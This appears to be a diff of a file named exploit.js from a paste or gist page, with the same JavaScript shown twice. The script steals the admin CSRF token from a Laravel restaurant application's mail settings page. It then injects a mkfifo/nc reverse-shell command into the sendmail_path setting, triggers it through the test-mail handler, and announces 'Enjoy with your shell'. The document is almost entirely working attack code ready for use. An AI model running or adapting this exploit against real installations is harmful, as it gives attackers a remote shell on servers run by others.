weev3 · April 1, 2021 12:47
diff --git a/exploit.js b/exploit.js
 var mailurl = "http://localhost/laravel/tasty/setup-master/admin/settings/edit/mail"

 var xhttp = new XMLHttpRequest();
 xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
       regex = /\"csrf-token\" content\=\"([A-Za-z0-9 _]*)\"/;
       content = this.responseText;
       var csrftoken = content.match(regex)[1]
       exploit(csrftoken,"");
    }
 };

 xhttp.open("GET", mailurl, true);
 xhttp.send();

 function exploit(name, cmd) {
    alert("Enjoy with your shell");
    var token = name;
    var data = "_method=PATCH&_token="+token+"&Setting%5Bsender_name%5D=Testing+Restaurant&Setting%5Bsender_email%5D=blahblah%40outlook.com&Setting%5Bprotocol%5D=sendmail&Setting%5Bsendmail_path%5D=%2Fusr%2Fsbin%2Fsendmail+-bs%3B"+"rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+127.0.0.1+1111+%3E%2Ftmp%2Ff"+"%3B&Setting%5Bsmtp_host%5D=smtp.gmail.com&Setting%5Bsmtp_port%5D=587&Setting%5Bsmtp_encryption%5D=tls&Setting%5Bsmtp_user%5D=blahblah1%40gmail.com&Setting%5Bsmtp_pass%5D=blahblah&Setting%5Bmailgun_domain%5D=&Setting%5Bmailgun_secret%5D=&Setting%5Bpostmark_token%5D=&Setting%5Bses_key%5D=&Setting%5Bses_secret%5D=&Setting%5Bses_region%5D=";
    var xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function() {
      if (this.readyState == 4 && this.status == 200) {
        console.log(this.responseText);
      }
    };
    xhttp.open("POST", mailurl, true);
    xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhttp.setRequestHeader("X-IGNITER-REQUEST-HANDLER", "onTestMail");
    xhttp.setRequestHeader("X-Requested-With","XMLHttpRequest");
    xhttp.setRequestHeader("X-CSRF-TOKEN", token);
    xhttp.send(data);
  }
	var mailurl = "http://localhost/laravel/tasty/setup-master/admin/settings/edit/mail"

	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	regex = /\"csrf-token\" content\=\"([A-Za-z0-9 _]*)\"/;
	content = this.responseText;
	var csrftoken = content.match(regex)[1]
	exploit(csrftoken,"");
	}
	};

	xhttp.open("GET", mailurl, true);
	xhttp.send();

	function exploit(name, cmd) {
	alert("Enjoy with your shell");
	var token = name;
	var data = "_method=PATCH&_token="+token+"&Setting%5Bsender_name%5D=Testing+Restaurant&Setting%5Bsender_email%5D=blahblah%40outlook.com&Setting%5Bprotocol%5D=sendmail&Setting%5Bsendmail_path%5D=%2Fusr%2Fsbin%2Fsendmail+-bs%3B"+"rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+127.0.0.1+1111+%3E%2Ftmp%2Ff"+"%3B&Setting%5Bsmtp_host%5D=smtp.gmail.com&Setting%5Bsmtp_port%5D=587&Setting%5Bsmtp_encryption%5D=tls&Setting%5Bsmtp_user%5D=blahblah1%40gmail.com&Setting%5Bsmtp_pass%5D=blahblah&Setting%5Bmailgun_domain%5D=&Setting%5Bmailgun_secret%5D=&Setting%5Bpostmark_token%5D=&Setting%5Bses_key%5D=&Setting%5Bses_secret%5D=&Setting%5Bses_region%5D=";
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	console.log(this.responseText);
	}
	};
	xhttp.open("POST", mailurl, true);
	xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
	xhttp.setRequestHeader("X-IGNITER-REQUEST-HANDLER", "onTestMail");
	xhttp.setRequestHeader("X-Requested-With","XMLHttpRequest");
	xhttp.setRequestHeader("X-CSRF-TOKEN", token);
	xhttp.send(data);
	}
No results found